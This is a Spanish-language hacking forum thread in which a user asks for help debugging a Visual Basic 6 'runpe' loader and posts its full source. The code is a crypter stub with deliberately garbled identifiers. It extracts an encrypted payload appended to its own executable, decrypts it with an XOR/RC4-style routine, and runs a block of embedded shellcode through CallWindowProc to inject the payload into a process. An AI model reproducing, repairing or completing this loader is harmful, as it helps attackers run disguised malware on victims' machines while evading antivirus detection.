elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Dudas Generales (Moderador: engel lex)
| | |-+  ayuda con llamar runpe
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con llamar runpe  (Leído 2,140 veces)
mirkosenior

Desconectado Desconectado

Mensajes: 1


Ver Perfil
ayuda con llamar runpe
« en: 6 Junio 2014, 12:06 pm »

hola a todos

¿Cómo puedo llamar a este runpe?

¿Alguien puede decirme dónde está el error?

Sub Main()

Dim AAAA As String

AAAA = App.Path & "\" & App.EXEName & ".exe"

Dim BBBB As String

Open AAAA For Binary As #1

BBBB = Space(LOF(1))

Get #1, , BBBB

Close #1

Dim sData() As String

sData() = Split(BBBB, "[Theref]")

sData(1) = ¥¶V«baDJØǬpRÆRQSgfâdãqG(sData(1), sData(2))

Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode))

End Sub

'RC4

Function ¥¶V«baDJØǬpRÆRQSgfâdãqG(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh As String, b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc As String) As String
Dim DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() As Byte
Dim WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() As Byte
Dim ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ As Long
Dim úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® As Long
Dim YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ As Long
Dim ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã As Long
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() = StrConv(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh, vbFromUnicode)
DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() = StrConv(b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc, vbFromUnicode)
YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ = UBound(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E)
ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã = UBound(DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj)
Do Until ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ > YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) = WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) Xor DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj(úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY®)
úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® + 1
If úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® > ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã Then úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = 0
ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ = ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ + 1
Loop
Erase DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj
¥¶V«baDJØǬpRÆRQSgfâdãqG = StrConv(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E, vbUnicode)
Erase WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E
End Function

'RUNPE

Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long
Dim Asm(121) As Currency
Asm(0) = 400681687.6885@
Asm(1) = -476253789078555.0612@
Asm(2) = 169590654935207.5756@
Asm(3) = 850533864474419.4055@
Asm(4) = 737729641913629.2885@
Asm(5) = 241583047782310.0933@
Asm(6) = 24366994722224.3183@
Asm(7) = -5591197446420.7926@
Asm(8) = 909185617598340.8258@
Asm(9) = -19175285449154.725@
Asm(10) = -74963712694652.2037@
Asm(11) = 364813893865675.1812@
Asm(12) = 417268265771289.998@
Asm(13) = -4467533218940.2859@
Asm(14) = 341408918860883.873@
Asm(15) = 24329165641253.0572@
Asm(16) = -704495800380865.7131@
Asm(17) = 374040769202653.0293@
Asm(18) = 132891045878384.5141@
Asm(19) = 330853606455412.8782@
Asm(20) = -18546831736735.2555@
Asm(21) = 319791640719971.9498@
Asm(22) = 908565053235531.3645@
Asm(23) = 204495311115001.8554@
Asm(24) = -854751321242618.2143@
Asm(25) = -74261121419612.3536@
Asm(26) = -853017920184789.9651@
Asm(27) = 853018044985278.6574@
Asm(28) = 11660982868296.5087@
Asm(29) = -644057630032745.1903@
Asm(30) = 389428549114434.7534@
Asm(31) = -76145685875174.3891@
Asm(32) = -74907416031185.4908@
Asm(33) = 494446016607881.1334@
Asm(34) = 373919167982197.785@
Asm(35) = -702326214173594.214@
Asm(36) = 852984839970549.146@
Asm(37) = 878491366656617.7029@
Asm(38) = 11660149244069.3242@
Asm(39) = -644057520081529.9839@
Asm(40) = 852992269963661.735@
Asm(41) = 118191623639287.4757@
Asm(42) = -61508987237432.1588@
Asm(43) = 683482598548397.6903@
Asm(44) = -602576477534616.4219@
Asm(45) = 312616265869225.0362@
Asm(46) = 823209967166017.4093@
Asm(47) = 242250886584983.6374@
Asm(48) = 855453146203670.4029@
Asm(49) = -79066168407783.6283@
Asm(50) = -566073494675362.3812@
Asm(51) = 707480649289074.6628@
Asm(52) = -637454398289603.5604@
Asm(53) = 244386299675628.5445@
Asm(54) = -815078417416403.5827@
Asm(55) = -18879051943875.1995@
Asm(56) = -822123707815930.6686@
Asm(57) = -18434021046527.2954@
Asm(58) = 912451606937402.8942@
Asm(59) = -644057520081529.9756@
Asm(60) = 736754098641473.959@
Asm(61) = 417322719301766.6436@
Asm(62) = 907260734372726.4513@
Asm(63) = 853017967675867.3294@
Asm(64) = 11660982865150.7807@
Asm(65) = -854635987033189.5019@
Asm(66) = 417315068676156.9237@
Asm(67) = -704495800377680.6639@
Asm(68) = 244384539136657.2125@
Asm(69) = -815078417416403.5827@
Asm(70) = 364126617392252.4421@
Asm(71) = 853022663170544.6404@
Asm(72) = -855129000041499.1355@
Asm(73) = 853017946071693.9733@
Asm(74) = 244396803451753.601@
Asm(75) = -535694978088672.9971@
Asm(76) = 853017945341749.0318@
Asm(77) = 850597150951837.7055@
Asm(78) = -693956410164477.1442@
Asm(79) = 392299672072137.6649@
Asm(80) = -75273081301284.3259@
Asm(81) = 233670410612668.8112@
Asm(82) = 232135816315923.5976@
Asm(83) = 282468056240967.6881@
Asm(84) = -701595207746232.5423@
Asm(85) = 173478023424630.523@
Asm(86) = -838890426140287.6832@
Asm(87) = 137505075359453.7978@
Asm(88) = 238303243668856.6869@
Asm(89) = 15754679864024.2693@
Asm(90) = 137137957478099.5152@
Asm(91) = 223974408162476.2226@
Asm(92) = -853018149249239.2854@
Asm(93) = 609147958724062.3211@
Asm(94) = 187716700156924.5176@
Asm(95) = 29051557366465.6234@
Asm(96) = 180486733836584.4849@
Asm(97) = -853018043593043.5209@
Asm(98) = 230703534374533.4347@
Asm(99) = 138151919766295.2044@
Asm(100) = -863941699156868.1112@
Asm(101) = 382501322004887.7562@
Asm(102) = 217671250279223.4602@
Asm(103) = -858396642110759.3865@
Asm(104) = 382501330594822.3482@
Asm(105) = 217671250279223.4602@
Asm(106) = -860029196975681.1913@
Asm(107) = 22128918341666.201@
Asm(108) = 129708668231386.2504@
Asm(109) = 138421474714790.2981@
Asm(110) = 273938087394568.7415@
Asm(111) = -703427576466491.6105@
Asm(112) = 368089803424522.0018@
Asm(113) = 273936330801683.6989@
Asm(114) = -703427576466491.6105@
Asm(115) = 382501322232107.5439@
Asm(116) = 224650062758754.033@
Asm(117) = -802975918546864.1941@
Asm(118) = 261111522452255.6862@
Asm(119) = 35367660677206.1368@
Asm(120) = 848492795353964.3185@
Asm(121) = 5.0164@

'Put Here the shellcode
eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0)
End Function


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda creacion RunPE VB6
Análisis y Diseño de Malware
fary 3 5,100 Último mensaje 28 Enero 2011, 22:33 pm
por fary
Que es un RunPE? « 1 2 »
Análisis y Diseño de Malware
x64core 11 14,980 Último mensaje 16 Octubre 2011, 11:29 am
por [Kayser]
Duda RunPE
Análisis y Diseño de Malware
[Kayser] 2 3,481 Último mensaje 10 Diciembre 2011, 13:34 pm
por [Kayser]
Funcionamiento de un RunPE « 1 2 »
Análisis y Diseño de Malware
[Kayser] 10 9,361 Último mensaje 29 Julio 2013, 19:53 pm
por arfgh
Ayuda RunPe win7
.NET (C#, VB.NET, ASP)
Cromatico 8 5,561 Último mensaje 30 Noviembre 2012, 13:19 pm
por Cromatico
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines